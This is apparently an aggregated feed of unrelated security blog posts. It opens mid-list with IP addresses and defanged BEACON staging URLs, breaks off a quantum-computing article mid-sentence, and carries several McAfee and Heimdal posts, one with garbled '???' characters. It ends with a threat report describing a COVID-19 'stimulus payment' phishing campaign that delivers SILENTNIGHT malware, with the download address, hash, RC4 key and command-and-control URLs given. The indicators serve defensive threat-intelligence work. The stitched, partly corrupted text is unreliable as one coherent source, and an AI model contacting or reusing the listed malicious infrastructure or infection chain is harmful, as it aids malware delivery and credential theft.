  • 108.61.209.123
  • 108.61.242.184
  • 140.82.5.67
  • 140.82.10.222
  • 140.82.27.146
  • 140.82.60.155
  • 144.202.12.197
  • 144.202.83.4
  • 149.28.15.247
  • 149.28.35.35
  • 149.28.50.31
  • 149.28.55.197
  • 149.28.81.19
  • 149.28.113.9
  • 149.28.122.130
  • 149.28.246.25
  • 149.248.5.240
  • 149.248.56.113
  • 149.248.58.11
  • 151.106.56.223
  • 155.138.135.182
  • 155.138.214.247
  • 155.138.216.133
  • 155.138.224.221
  • 207.148.8.61
  • 207.148.15.31
  • 207.148.21.17
  • 207.246.67.70
  • 209.222.108.106
  • 209.250.255.172
  • 216.155.157.249
  • 217.69.15.175

BEACON Staging URLs

  • hxxp://104.156.255[.]79:80/avbcbgfyhunjmkmk
  • hxxp://149.28.50[.]31:80/adsrxdfcffdxfdsgfxzxds
  • hxxp://149.28.81[.]19:80/ajdlkashduiqwhuyeu12312g3yugshdahqjwgye1g2uy31u1
  • hxxp://45.32.161[.]213:80/ephfusaybuzabegaexbkakskjfgksajgbgfckskfnrdgnkhdsnkghdrngkhrsngrhgcngyggfxbgufgenwfxwgfeuyenfgx
  • hxxp://45.63.8[.]219:80/ajhgfrtyujhytr567uhgfrt6y789ijhg
  • hxxp://66.42.97[.]225:80/aqedfy345yu9876red45f6g78j90
  • hxxp://findtus[.]com/akkhujhbjcjcjhufuuljlvu
  • hxxp://thedemocraticpost[.]com/kflmgkkjdfkmkfl
  • hxxps://brainschampions[.]com:443/atrsgrtehgsetrh5ge
  • hxxps://ciscocheckapi[.]com:80/adsgsergesrtvfdvsa
  • hxxps://cylenceprotect[.]com:80/abresgbserthgsbabrt
  • hxxps://havesetup[.]net/afgthyjuhtgrfety
  • hxxps://servicesbooster[.]org:443/sfer4f54
  • hxxps://servicesecurity[.]org:443/fuhvbjk
  • hxxps://timesshifts[.]com:443/akjhtyrdtfyguhiugyft
  • hxxps://timesshifts[.]com:443/ry56rt6yh5rth
  • hxxps://update-wind[.]com/aergerhgrhgeradgerg
  • hxxps://updatemanagir[.]us:80/afvSfaewfsdZFAesf

To Tune Up Your Quantum Computer, Better Call an AI Mechanic

A high-end race car engine needs all its components tuned and working together precisely to deliver top-quality performance. The same can be said about the processor inside a quantum computer, whose delicate bits must be adjusted in just the right way before it can perform a calculation. Who’s the right mechanic for this quantum tuneup job? According to a team that includes scientists at the National Institute of Standards and Technology (NIST), it’s an artificial intelligence, that’s who. The team’s paper in the journal Physical Review Applied outlines a way to teach an AI to make an

Don’t Be an April Fool – Protect Your Digital Assets

Be Part of World Back Up Data Day on 31st March

There are not many worse feelings that the realisation that a document you’ve worked tirelessly on has vanished! We’ve all been there and it’s not nice at all. Whether you break into a sweat, scream or even say a word you shouldn’t – losing precious data is downright awful.

With World Backup Day now a fixture on our calendars, there should be no excuses for not protecting your valuable document and digital files. So, please mark March 31 in your diary people because this is a great reminder to us all about ensuring we have all the right procedures in place to protect our digital assets.

What Does ‘Backing-Up’ Really Mean?

Backing-up means you have a second copy of your key files which includes documents, photos, videos and even your emails. And this second copy needs to be stored somewhere else that is away from your computer for example, on a hard drive or online using a cloud storage service.

Some people think that this process happens automatically, however, I’m here to inform you that it doesn’t. Unfortunately, there are no magic back-up fairies. We each need to take charge and set up processes to protect our precious documents.

Why Do We Need To Back-Up?

Take a minute to think about everything you have stored on your digital devices. Of course, there are important documents, emails and likely scans of essential documents but what about your music collection and the pics and videos of your family? Imagine losing these. I know I’d be heartbroken.

While there aren’t any recent studies into the value of our digital assets, in 2014 McAfee undertook research and found that Aussies valued their online assets at a whopping $30,000! So, 6 years later, I’d estimate that would figure would be closer to $50,000! Definitely a reason to take action!

But, Doesn’t Everyone Back-Up?

In short, no! According to the people at World Backup Day, 30% of us have never backed up! And when you consider that 113 phones are lost or stolen every minute, that 1 in 10 computers are infected with viruses every month and that 29% of lost data scenarios are caused by accidental human error – it really does make you wonder why!

Let’s Participate in World Back-Up Day!

Data is regarded as one of the most valuable assets in the modern world. It’s basically digital gold! While backing up your personal and sensitive data is something that should be done routinely, World Back-Up Day is a great reminder to us all that we need to get our back-up plan sorted! I know it all sounds tedious, but trust me, it’s less work than the trouble you’d find yourself in after losing important files!

Here are some easy tips to help you ensure you are taking the right steps to safeguard your data this World Backup Day!

  1. A Two-Pronged Approach Is Best

Take the extra step and go both routes for a thorough backup by using an external drive and a cloud service. Losing a document can be the most frustrating thing so it’s always better to be safe than sorry when it comes to your personal data.

  1. Don’t Forget About Your Mobile Device

Back up data from your mobile devices onto a central laptop or personal computer for an added layer of security and protection.

  1. Don’t Rely on Memory Alone!

While routinely backing up your data is one of the most important steps, it can be the first to slip our minds when life gets in the way. Make it super easy to regularly backup by using the existing automatic and scheduled backup features that already come with cloud services and many external drives.

  1. Test It Out!

On top of scheduling regular data backups, make it a habit to routinely check your ability to restore data from backups to ensure they have been performed correctly and haven’t been compromised.

Some of our ‘lowest’ family moments have been a result of family members forgetting to ‘back-up’.  Only months before last year’s HSC, no. 3 son left his laptop on a train. It took me days to recover from the news that he hadn’t been backing up despite my regular reminders!! Yes, we’re all human but if we can minimise the horrendous stress and upset that is caused by ‘lost’ documents and images then that can only be a good thing!

Happy World Back-Up Day everyone!

 

The post Don’t Be an April Fool – Protect Your Digital Assets appeared first on McAfee Blogs.

McAfee Named a 2020 Gartner Peer Insights Customers’ Choice for SWG

Gartner Peer Insights Customer Choice 2020

The McAfee team is very proud to announce today that, for the second year in a row, McAfee was named a 2020 Gartner Peer Insights Customers’ Choice for Secure Web Gateways for its Web Solution.

In its announcement, Gartner explains, “The Gartner Peer Insights Customers’ Choice is a recognition of vendors in this market by verified end-user professionals, taking into account both the number of reviews and the overall user ratings.” To ensure fair evaluation, Gartner maintains rigorous criteria for recognizing vendors with a high customer satisfaction rate.

Gartner Peer Insights Customer Choice 2020

 

For this distinction, a vendor must have a minimum of 50+ published reviews with an average overall rating of 4.3 stars or higher. McAfee received 138 reviews and an overall 4.5 rating out of 5, as of 28 March 2020, accordingly.

Here are some quotes from customers that contributed to this distinction:

“Extremely flexible product with excellent detection capabilities”

“McAfee’s web security provides a high level of protection along with significant policy flexibility. The solution is very capable compared to competitive offerings.”

AVP, Cybersecurity in the Finance Industry: Read full review here

Mature Security Solution”

“Excellent solution to assure web security and monitor critical information, malware inspection and prevention of unwanted downloads. It provides protection for almost everything. Easy installation and administration. Excellent support from the vendor.”

CISO in the Services Industry: Read full review here

To learn more about this distinction, or to read the reviews written about our products by the IT professionals who use them, please visit Gartner Peer Insights’ Customers’ Choice announcement for Web. To all of our customers who submitted reviews, thank you! These reviews mold our products and our customer journey, and we look forward to building on the experience that earned us this distinction!

The GARTNER PEER INSIGHTS CUSTOMERS’ CHOICE badge is a trademark and service mark of Gartner, Inc., and/or its affiliates, and is used herein with permission. All rights reserved. Gartner Peer Insights Customers’ Choice constitute the subjective opinions of individual end-user reviews, ratings, and data applied against a documented methodology; they neither represent the views of, nor constitute an endorsement by, Gartner or its affiliate.

The post McAfee Named a 2020 Gartner Peer Insights Customers’ Choice for SWG appeared first on McAfee Blogs.

Financial Sector Cybersecurity Framework Profile Consolidates Regulatory Requirements

Cyberattacks are an all too common occurrence, especially for financial institutions. In response, we are seeing an influx of security rules and regulations for financial institutions to follow. And ??? although the regulations are beneficial ??? complying with the regulations can be time consuming and costly.

According to findings from the technology division of the Banking Policy Institute (BITS), ???One firm???s Chief Information Security Officer estimated that 40 percent of his time and that of his team was devoted to reconciling various requirements of regulatory agencies.??? And a report from Boston Consulting Group (BCG) cited that a multinational bank was spending more than 15 percent of its annual operating budget on risk and compliance.

In an effort to mitigate the time and financial restraints, BCG, BITS, and more than 150 financial services institutions came together to develop the Financial Sector Cybersecurity Framework Profile. The profile consolidates regulatory requirements, making it easier to comply with multiple requirements. This is a major win for financial services institutions because, according to industry data collected by BITS, over 30 cybersecurity regulations have been released in the past five years, with plans to issue more.ツ?

With the profile now in place, financial services institutions don???t have to answer a separate set of reporting questions to prove compliance with every rule and regulation. There is now one framework that encompasses all of the rules and regulations with a consolidated set of questions. According to BCG, having one common framework has reduced the number of questions by 49 percent for large organizations and 73 percent for small ones.

Aside from the decrease in compliance questions, the time and money saved from the profile helps financial institutions focus on the main aspects of their cybersecurity program, innovation, and ??? most importantly ???their clients.

The response from the new profile has been overwhelmingly positive. As Paul Farrington, EMEA Chief Technology Officer at Veracode stated:

???Financial services firms have to deal with a myriad of regulations, especially relating to cybersecurity. We need organisations to be held accountable for improving their security posture. Standards are vital, but reporting can be a real burden and, in some cases, gets in the way of doing valuable security work. We welcome the Financial Sector Cybersecurity Framework Profile. It should help teams fast-track compliance exercises and create capacity for additional security focus.???

Any financial institution, regardless of size, can leverage the profile. It encompasses more than 30 US federal, state, and global regulations, including the NIST Cybersecurity Framework, The International Organization for Standardization (ISO)/International Electrotechnical Commission (IEC) 27001, and The Committee on Payments and Market Infrastructures (CPMI)-International Organization of Securities. The profile should address up to 90 percent of regulatory requirements at one time, enabling companies to focus on threats. The hope is for the profile to incorporate more global regulations in the coming years.

For additional information on the new profile, please read the Financial Sector Cybersecurity Framework Profile user guide.

10 McAfee Women Share Top Career Highlights

Looking to reach your career best? At McAfee, we invest in your growth and development to help you get there. In honor of Women’s History Month, we asked members of our McAfee Women in Security Community (WISE) to share their favorite experiences at past and present jobs, including what they love about working at McAfee.

  1. Back in the mid-2000’s, I worked for a startup company in infrastructure services. One of the most exhilarating moments was winning a five-year $30 million-dollar services deal. This one deal enabled us to move into new emerging markets, develop our position and compete with bigger service providers. When we won, we couldn’t quite believe it—it was one of those surreal moments you never forget. When I look back now, I realize I was very fortunate to have a mentor and boss who demonstrated his trust in me (so early in my career!) to pursue a deal that was very high risk to the company.” —Mandy, Director, Sales
  2. My biggest career moment has been meeting the Minister of Veterans Affairs on Parliament Hill while the House of Commons was sitting and discussing how analytics could help veterans and PTSD. When I think about what I love about my job and what I do, I’m in sales and have always been in sales. I’m a ‘people person.’ I love networking and solving customer issues. I could argue I’ve been in sales since Girl Guide Cookies!” —Eliane, Director, Sales
  3. One of my favorite career highlights has definitely been being part of the WISE Board at McAfee. I get to work with smart, diverse, global women who truly want to help each other and make a difference. Also, the people (our internal teams and our customers) are truly the best. I love working with passionate caring people that want to make a difference and keep people safe!—Brenda, North America Consumer Sales & WISE Board Member
  4. My biggest career highlight is achieving the title of principal engineer in McAfee. I’m honored and humbled to be one of three women in PEs out of 7000+ people in McAfee. It allows me to have a broad vision of the company and a large platform to enable change and impact. I love my job because I am able to work on challenging projects and have a very supportive, diverse group that supports and empowers me to make an impact.” —Catherine, Principal Engineer & Senior Data Scientist
  5. My biggest career highlight was becoming a principal engineer! I have loved numbers since I was in kindergarten. One of my first school reports says ‘Sorcha is working her way through her math with obvious enjoyment.’ I love my data tools and I have one of the biggest and most interesting data sets in the world with Global Threat Intelligence data!—Sorcha, Principal Engineer, Lead Data Scientist
  6. My biggest career highlight was winning Worldwide Sales Director of the Year for FY 2017, hands down! My team won 5/6 awards at Club that year. Knowing we had a significant impact on McAfee and experiencing that level of success as a team was an amazing feeling. I still feel so incredibly proud to be part of this team. Every day is different and each day brings a new challenge to solve. Sales can be a roller coaster; staying focused on problem solving for the customer helps me stay connected to the purpose. When you consider what we are tasked with protecting, it’s impossible not to feel like we are doing something meaningful.” —Marty, VP Sales Enterprise East & Global WISE President
  7. My biggest career highlight was transitioning into my current role and finishing my first year in this position by presenting at MPOWER 2019. I love being a professional in cybersecurity and helping keep people safe is something I am very proud of. McAfee has also provided me with work life balance that ensures I have quality time with my family.” —Shelly, Professional Services Consultant
  8. I started with a simple job of web categorization and became a security researcher handling large and complex data and automation for my team. I love my job because I’ve been able to grow with it. I do a lot of research and analysis. It’s like putting pieces of a puzzle together, the kind of challenge I enjoy. At the beginning, I don’t know what the pieces are or what they mean—but as I do research, collect data, and put it all together, then it becomes something meaningful.—Kyoko, Security Researcher
  9. My biggest career highlight has been my seamless transition into my current role and being an active member of WISE, Toastmasters and Culture Club. I enjoy the opportunity to work with different people every single day. Looking at the big picture, connecting the dots and dealing with uncertainties while helping the team stay on track keeps me on my toes. McAfee has an amazing culture with extraordinary people and getting to know them every single day has been delightful.—Arathi, Technical Program Manager
  10. Solving specific customers’ problems and contributing to making sure McAfee is recognized as the cloud security thought leader feels great. It’s thrilling to use my whole self to help solve a global problem using strategic thinking, technical understanding and traditionally feminine skills I bring, like storytelling and compassionate communication.

The mission of protecting what matters is really meaningful to me. Second, I love my varied work—from storytelling and technical analysis (every architecture is a story) to influencing customer security executives and encouraging the next generation of security professionals. Third, PEOPLE. Thank you to all of my colleagues who encourage me, improve my results by challenging me and especially those who do both!—Brooke, Sr. Cloud Architect/Strategist


If you’re looking for a fulfilling career with a company dedicated to helping women thrive in the workplace, check out our openings!

The post 10 McAfee Women Share Top Career Highlights appeared first on McAfee Blogs.

Decision Making Before and During Times of Crisis:  A Parallel Between Cybersecurity Incidents and the Current COVID-19 Pandemic

The coronavirus pandemic is not only the first time in history when a biological virus also affects the cybersecurity industry (through phishing attacks and COVID-19-themed malware) but the way the breakout has been handled so far also resembles how certain IT decision-makers may react when it comes to dealing with security issues.

So far, the crisis has been approached from different angles by governments around the world. The pandemic is now causing major disruptions in the way we live and work, and perhaps, irreversibly. It is an unprecedented health and economic disaster, which puts our collective ability to respond to the test.

How prepared are governments? How about us as citizens? Why don’t we all focus on prevention rather than on dealing with the consequences?

A comparison between decision making in Cybersecurity and the COVID-19 pandemic

If you think about it, in many cases, cyber-attacks and malware behave and spread in ways similar to a pandemic. Some digital threats are even called “viruses”, after all.

But how do cybersecurity leaders generally make decisions compared with how currently government officials are dealing with the COVID-19 pandemic?

Without the intention of trying to oversimplify the complexity and severity of the COVID-19 pandemic, I’ve discovered some similarities that I would like to point out.

#1. Inaction fueled by optimism bias

Even though we like to think of ourselves as rational creatures, it’s in human nature to disregard risk associated with – well, anything…

Why? The optimism bias phenomenon is to be blamed. In short, it refers to the belief that we have lower chances of being affected by negative events than other people and that we are more likely to experience positive events than our peers.

The term was coined by Neil D. Weinstein in 1980, who through his experiment discovered that most college students thought their chances of developing a drinking problem or getting divorced were lower than that of their colleagues. Simultaneously, the majority of these students also believed that the odds of positive things happening to them (such as owning a house and growing old) were much higher.

In a recent article, Marie Helweg-Larsen, Professor of Psychology, argues that certain people are refusing to change their behavior during the current coronavirus pandemic due to optimism bias. For instance, if you don’t believe chances are you may be infected, you might think that interacting with your grandmother won’t be harmful. This way, due to the infection’s uncertainty, you tend to minimize risk.

The perception around risk can be difficult to change. But since social distancing and staying at home are now typically considered the moral thing to do, people may be more likely to change their attitude when thinking about keeping others safe (and not themselves, in particular). So, no longer focusing on your own personal risk may fuel a more protective behavior.

Obviously, not only regular citizens found themselves under the optimism bias since the COVID-19 pandemic has emerged. In the same manner, leaders around the world have been crippled by inertia and tended to underestimate the critical impact the novel coronavirus would have on their countries, healthcare systems, and the economy.

How common is optimism bias in cybersecurity?

Of course, optimism bias can also be observed in the cybersecurity field. In short, this phenomenon prevents some security leaders from taking preventative measures and therefore hinders companies from achieving a good security posture.

The results of a study revealed that security executives are indeed affected by the optimistic bias. The report concludes they thought their risk to be substantially lower than that of the companies they were compared with. Furthermore, they seemed to be aware of the existing risks, yet still can not completely grasp the magnitude of a potential accident.

The same study has shown that subjects, at the very least, acknowledged their interconnectedness with their business partners. Even though they considered themselves to be less prone to risk than other companies, they seemed to perfectly understand that they could themselves become victims due to the third-parties they partnered up with. These dangers are nowadays commonly referred to as Supply Chain Attacks or Vendor Email Compromise (VEC) threats.

How to avoid bias when building your cybersecurity strategy

Biases impact decision-making processes and obviously, the cybersecurity industry is no exception to the rule.

So, how can you, as an IT decision-maker, avoid being under the influence of cognitive biases?

Here are a few points to consider:

  • Becoming aware of optimism bias and accepting that the phenomenon is an inherent part of us as humans. This is the first step toward taking impartial, unbiased decisions.
  • Looking at real-life examples. Understanding how organizations that match your own profile were impacted by cyberattacks and analyzing how your company would react when faced with a similar scenario. Would it be prepared to deal with an attack or miserably fail? How cyber resilient is your organization?
  • Thinking about the overall positive impact of a strong cybersecurity strategy on your business. Now, organizations should not simply begin applying scare tactics upon themselves and should start realizing how threat prevention and mitigation will keep their company up and running.

#2. Testing and micro-segmentation

So far, countries that have proved to be the most successful in managing COVID-19 infections behaved the same way cyber resilient organizations do. And the ones that failed to keep the epidemic under control did not have all the prevention and mitigation measures in place.

For instance, as the epidemic was (not so) slowly increasing, Britons were encouraged to “keep calm and carry on” and let the herd immunity strategy, which was heavily criticized in the end, do the trick. Prime Minister Boris Johnson later admitted that Britain was going through the “greatest public health crisis for a generation” and started implementing some forms of social distancing measures.

After the first American case was announced in late January, when asked if he believed this would turn into a pandemic, President’s Donald Trump response was “No. Not at all. And we have it totally under control. It’s one person coming in from China, and we have it under control. It’s going to be just fine.”

In early March, Trump was still suggesting that the virus was “less serious than the flu” and reassuring people that “It will go away. Just stay calm. It will go away.” Meanwhile, the U.S. was falling behind on testing and some Trump administration officials were responding with untruths, suggesting that anyone who wanted could get tested when in reality, the shortage of testing kits was being revealed. As of March 30, 2020, the U.S. has the most confirmed COVID-19 cases in the world, surpassing China, Italy, and Spain.

In the meantime, South Korea, Singapore, and Taiwan have managed to contain the outbreak due to diligent testing and social distancing measures.

Below you can see the number of Tests conducted vs. Total confirmed cases in different countries around the world:

Along the same lines, the same testing (or monitoring) practices should be followed in cybersecurity.

Should threats remain hidden inside your organization, there will be room for lateral movement and future exploitation. However, the spread of malware infections can be stopped if you put a segmented architecture based on Zero Trust in place. This model originates from the belief that one should never trust anything inside an organization by default and should always verify everything in the first place. Zero trust networks are based upon micro-segmentation, which divides perimeters into small areas so that certain parts of your network remain isolated and have separate access. In case a data breach occurs, micro-segmentation limits further exploitation of your network.

What’s more, simply because people aren’t displaying any visible symptoms of COVID-19, that doesn’t necessarily mean they are not infected and therefore shouldn’t get tested. There have been cases of coronavirus false-negatives so far, which leaves experts worried about this type of inaccuracy amidst the outbreak.

However, even though universal testing may sound utopic due to logistical constraints and shortage of testing kits, the same should not apply when it comes to your organization’s security.

Most nations that have had a hard time enforcing social isolation rules have witnessed COVID-19 infections growing quicker. Italy, for instance, around a week ago, when around 41,000 people were infected and the outbreak was already out of control, was charging 50,000 individuals for breaking isolation laws. Fast forward another week later, the cases in Italy had almost doubled.

On the other hand, after imposing draconian lockdown measures and despite being the outbreak’s original source, China managed to flatten the coronavirus curve. They tried to proactively find infections rather than just passively wait for symptoms to develop. As you may already know, this approach is also considered a best practice in cybersecurity.

What’s more, a study has shown that as human mobility decreased in China after social distancing measures were put in place, so did new infections.

Image source: “The effect of human mobility and control measures on the COVID-19 epidemic in China”, available here

As you can see in Graph a, human mobility dropped after January 23, 2020, and was considerably lower than compared to January 2019, when cordon sanitaire (the health measures aimed at controlling the spread of the disease) was put in place for Wuhan. And after this date, the number of coronavirus cases and infection rate also started decreasing, as you can notice in the charts below:

Image source: “The effect of human mobility and control measures on the COVID-19 epidemic in China”, available here

#3. Improving your defenses and mitigating risk

During this critical period, hospitals and governments had to beef up their defenses against COVID-19. Basically, now more medical supplies than ever, such as gloves, gowns, or ventilators, have to be purchased. Needless to say, having the right number of protective equipment is vital. However, unfortunately, many countries are unprepared, even though they should have been able to see a crisis like this one coming.

“When we have done exercises in the past for pandemic preparedness, supply chain issues were a well-documented challenge”, commented Saskia Popescu, an epidemiologist focused on hospital preparedness, for Vox.com. “This is something we’ve known about — maybe not to this extent, but this isn’t a shocker. It’s more surprising that we let it get this bad.”

Knowing that disaster could strike anytime is not to be neglected.

In a similar fashion, the same reasoning can be applied to an organization’s cybersecurity. Since being aware that cyber-attacks and data breaches can linger around the corner, would you not wish to protect your digital assets in the best possible way?

Only through proactive security measures, such as staying on top of your patching or scanning your organization’s incoming and outgoing traffic through DNS filtering coupled with reactive defenses, like using a next-gen Antivirus and then extending your defenses to email security and privileged access rights management, your organization can achieve true cyber resilience.

What organizations can learn from a cybersecurity standpoint

First of all, security leaders should accept that any organization is exposed to cyber threats. After all, it’s a matter of when (not if).

Secondly, another vital step refers to testing (or in other words, gaining visibility inside your organization). This is how you can understand exactly if or which parts of your business are being affected and in case of an existing infection, be able to address it correctly. As I’ve mentioned before, micro-segmentation is recommended. Dividing your network into different security segments with fine-grained security controls will help you isolate areas and limit the spread of a potential infection.

Last, but not least, organizations should operate with a prevention-first mindset and combine proactive and reactive protection measures. Prevention is still the best cure, after all.

Heimdal Official Logo

Simple Antivirus protection is no longer enough.

Thor Premium Enterprise

is the multi-layered Endpoint Detection and Response (EDR) approach
to organizational defense.
  • Next-gen Antivirus which stops known threats;
  • DNS traffic filter which stops unknown threats;
  • Automatic patches for your software and apps with no interruptions;
  • Protection against data leakage, APTs, ransomware and exploits;
Try it for FREE today Offer valid only for companies.

Bottom Line

In today’s unprecedented context, how long the COVID-19 pandemic will last is still uncertain. However, what is clear is that it has raised highly complex issues and revealed serious flaws in crisis management in many countries around the world. The outbreak only shows that we are completely unprepared to deal with it. However, it’s (probably) not too late to act now, remain optimistic, and learn how to prevent future outbreaks.

The post Decision Making Before and During Times of Crisis:  A Parallel Between Cybersecurity Incidents and the Current COVID-19 Pandemic appeared first on Heimdal Security Blog.

Cloud Security: Why You Need Device Control

With remote working, BYOD, employees using their own devices and shared access to collaborative cloud apps from business partners – we need to include device control when allowing access to our cloud services.

Many cloud services have admin options to restrict access and functionality, sadly many of these features are unused, either because they seem complex or not important compared to other aspects of the service.  One that is often ignored is setting policies by device.

Cloud services often allow collaboration between different users and their strength is the wide device support they offer; the assumption is that most can be accessed either via specific apps or most browsers on most operating systems. The users may be employees or business partners and may be using managed, unmanaged, trusted or untrusted devices with the latest security updates or old systems with no device security – so now is the time to review and set policies based on device information.

Here’s some of the potential different risky scenarios we should be controlling.

  • An employee using BYOD or unmanaged devices and downloading confidential information onto an insecure device that is subsequently lost or infected to exfiltrate data.
  • An employee logging in from a friend of family member’s device and again downloading information or editing a document on that device and uploading it, potentially uploading malware.
  • A business partner using their own device, uploading malware inadvertently as their device wasn’t secured.

Policies to address these and other risky scenarios could include:

  • Allow users to view but not download content to unmanaged devices.
  • Disallow uploads from unknown devices.
  • Implement DLP policies to all devices downloading data when outside the organisation.

Cloud admins need to consider each of these scenarios and decide the appropriate policies and define them in the cloud service. There are many possible conditions, though obviously not all cloud services support each condition. By using Boolean logic, many different sets of criteria can be compared to consider each of the conditions

  • Managed / unmanaged device
  • Operating system in use
  • Activity (upload, post, download)
  • Agent (McAfee MCP, Zscaler, others)
  • Managed by EMM systems such as MobileIron and AirWatch
  • IP address for geo-location
  • User/group as defined in authentication system (LDAP etc.)
  • Request classifier (allowing deeper drill down into cloud services)
  • User domain

The actions based on the conditions that could be supported include:

  • Allow access / Deny access
  • Check certificate on the device
  • Step-up Authentication to re-authenticate the user
  • Proxy all subsequent traffic from this device to enable other controls
  • Redirect traffic
  • Implement specific DLP policy

Not all cloud services offer policies based on each condition, what is supported is worth checking before buying a particular cloud service, or use this list to lobby for stronger policy capabilities in your favorite service.  Each service has admin capabilities to define these services, though it is often much easier to set it once and push out to all cloud services by using a CASB solutions such as MVISION Cloud.

To dig deeper into “request classifier”, this can refer to parts of a cloud service allowing admins to define more granular policies, such as allowing unmanaged devices to access OneDrive but not SharePoint or blocking a device not on the corporate network from accessing the O365 Admin portal.

Device control is only one row of the Cloud Security 3600 Shared Responsibility Model – There are nine rows in total, the whole paper is available from here.

The post Cloud Security: Why You Need Device Control appeared first on McAfee Blogs.

Little Ones Online More? Here Are 10 Basics To Keep Them Safe

protecting kids online

Online safety conversations look dramatically different depending on the age and stage of your child. For very young children, toddlers through elementary school, parents have a golden opportunity to lay the foundations that will shape a child’s digital perspectives and behaviors for a lifetime.

One way to keep younger children safe online is simply to begin. How early, you might ask? From the day they arrive. If you’ve ever seen a four-month-old reach for mommy’s smartphone only to cry when mommy takes it away, it’s clear the baby has observed the culture around him. He knows that the shiny toy that hums is one of mommy’s favorite things. It has the power to capture and hold her attention. It makes her laugh, cry, and influence her routine and emotions.

Protecting kids online

Modeling balanced screen habits is a powerful way to influence behavior as toddlers begin to discover television, apps, interactive toys, and online learning sites. At this stage, intentional steps such as limiting screen time, reviewing content, and talking with your little one in simple concepts about the images and stories encounter will help grow their digital IQs. Note: The American Academy of Pediatrics (AAP) recommends keeping all screens turned off around babies and toddlers younger than 24 months.

Move With The Curve

As kids move into elementary school, technology is often part of the learning experience. Some children (depending on the household) may even own smartphones. Because the integration of technology begins to increase, this stage requires parents to move with the curve of a child’s online safety needs. Priorities: Securing devices kids take to school, setting filters on web browsers, limiting screen and gaming time, encouraging physical activity and hobbies, and having consistent, age-appropriate conversations about the online world is more important than ever.

10 Online Safety Basics for Younger Children

  1. Keep devices in a common area. By locating all computers, TVs, and devices in a common area, parents can easily monitor a child’s online activity. This simple step also helps kids get used to parental monitoring and responsible digital behavior.
  2. Follow family device rules. Establish family ground rules for technology use and repeat them to your younger children. Every child’s maturity and self-control level is different. If you think your child’s connection with his or her technology begins to tip toward the unhealthy, make adjustments as you go. If you set a 20-minute game time limit, be ready to enforce it consistently. In our experience, inconsistency in enforcing technology rules when kids are young is one of the biggest regrets among parents of teens.
  3. Introduce password security. As we accumulate IoT devices, it’s common for younger children to interact with home assistants, SmartTVs, digital toys, and online games. When password prompts come up on a login screen, explain to your child what you are doing (use your password) and why passwords are necessary. Get into the habit of using 2-factor authentication for passwords and locking your device home screens with a pin code.
  4. Filter content. Younger kids accept content at face value and don’t have the critical thinking skills process information or to be alone online. If you allow younger kids online, consider sitting with them, and explaining the content in front of them. To avoid the chance of your child encountering inappropriate content by mistake, consider adding parental control software to family devices.protecting kids online
  5. Start the privacy conversation. Kids of all ages understand the word “mine.” As your kids interact with the online in the early years, explain why it’s essential to keep their name, picture, family member names, school name, and address private.
  6. Introduce VPN use early. Browsing on a secure network (VPN, Virtual Private Network) from an early age reinforces the concept of privacy online. Explain to your child how the private encryption “tunnel” your content (searches, activity, messages) passes through and how that keeps other people from grabbing your private information. Even a text conversation with Grandma could accidentally give away information.
  7. Explain the concept of scams. When age-appropriate, explain how (and why) some people online try to trick you into clicking a box or a link to learn more about you. Discuss why you shouldn’t click on pop-up ads, hyperlinks, and messages that could contain malware or phishing links. To guard family devices against malicious links, consider free tools like Web Advisor.
  8. Discuss digital stranger danger. When you open a web browser, you open your home to content and people you don’t know. Children of any age can inadvertently run into digital danger zones. Teach young children not to talk to a stranger online or send (or share) photos with others. It’s also a good idea to cover the camera lens on your laptop or tablet, advise children to never stay on a website you would not approve of, and to never download or click a link without asking your permission.
  9. Introduce safe social networking. Online communities are here to stay, so consider starting social network safety talks early. Several kid-friendly browsers, apps, and social networks exist online for younger kids and are perfect for teaching them about privacy settings, how to collaborate and interact with others online.
  10. Start talking. Keep talking. Of all the principles we’ve featured, we’ve saved the best for last. Creating an open, trusting dialogue with your child is your #1 security tool in keeping your child safe online today and into the future.

While schools introduce kids to internet safety basics to protect kids online and do well to refresh concepts along the way, it’s the consistent, intentional work of parents that shape the values and skills a child needs to navigate the online world. By putting some of these foundational principles in place early and committing to consistent follow-through, it’s possible to maintain critical influence as your children move into different phases of their digital lives.

The post Little Ones Online More? Here Are 10 Basics To Keep Them Safe appeared first on McAfee Blogs.

Social Engineering Based on Stimulus Bill and COVID-19 Financial Compensation Schemes Expected to Grow in Coming Weeks

Given the community interest and media coverage surrounding the economic stimulus bill currently being considered by the United States House of Representatives, we anticipate attackers will increasingly leverage lures tailored to the new stimulus bill and related recovery efforts such as stimulus checks, unemployment compensation and small business loans. Although campaigns employing themes relevant to these matters are only beginning to be adopted by threat actors, we expect future campaigns—primarily those perpetrated by financially motivated threat actors—to incorporate these themes in proportion to the media’s coverage of these topics.

Threat actors with varying motivations are actively exploiting the current pandemic and public fear of the coronavirus and COVID-19. This is consistent with our expectations; malicious actors are typically quick to adapt their social engineering lures to exploit major flashpoints along with other recurrent events (e.g. holidays, Olympics). Security researchers at FireEye and in the broader community have already begun to identify and report on COVID-19 themed campaigns with grant, payment, or economic recovered themed emails and attachments.

Example Malware Distribution Campaign

On March 18, individuals at corporations across a broad set of industries and geographies received emails with the subject line “COVID-19 Payment” intended to distribute the SILENTNIGHT banking malware (also referred to by others as Zloader). Despite the campaign’s broad distribution, a plurality of associated messages were sent to organizations based in Canada. Interestingly, although the content of these emails was somewhat generic, they were sometimes customized to reference a payment made in currency relevant to the recipient’s geography and contextually relevant government officials (Figure 1 and Figure 2). These emails were sent from a large pool of different @gmx.com email addresses and had password protected Microsoft Word document attachments using the file name “COVID 19 Relief.doc” (Figure 3). The emails appear to be auto generated and follow the format <name>.<name><SevenNumberString>@gmx.com. When these documents were opened and macros enabled, they would drop and execute a .JSE script crafted to download and execute an instance of SILENTNIGHT from http://209.141.54[.]161/crypt18.dll.

An analyzed sample of SILENTNIGHT downloaded from this URL had an MD5 hash of 9e616a1757cf1d40689f34d867dd742e, employed the RC4 key 'q23Cud3xsNf3', and was associated with the SILENTNIGHT botnet 'PLSPAM'. This botnet has been seen loading configuration files containing primarily U.S.- and Canada financial institution webinject targets. Furthermore, this sample was configured to connect to the following controller infrastructure:

  • http://marchadvertisingnetwork4[.]com/post.php
  • http://marchadvertisingnetwork5[.]com/post.php
  • http://marchadvertisingnetwork6[.]com/post.php
  • http://marchadvertisingnetwork7[.]com/post.php
  • http://marchadvertisingnetwork8[.]com/post.php
  • http://marchadvertisingnetwork9[.]com/post.php
  • http://marchadvertisingnetwork10[.]com/post.php


Figure 1: Example lure using CAD


Figure 2: Example lure using AUD


Figure 3: Malicious Word document

Example Phishing Campaign

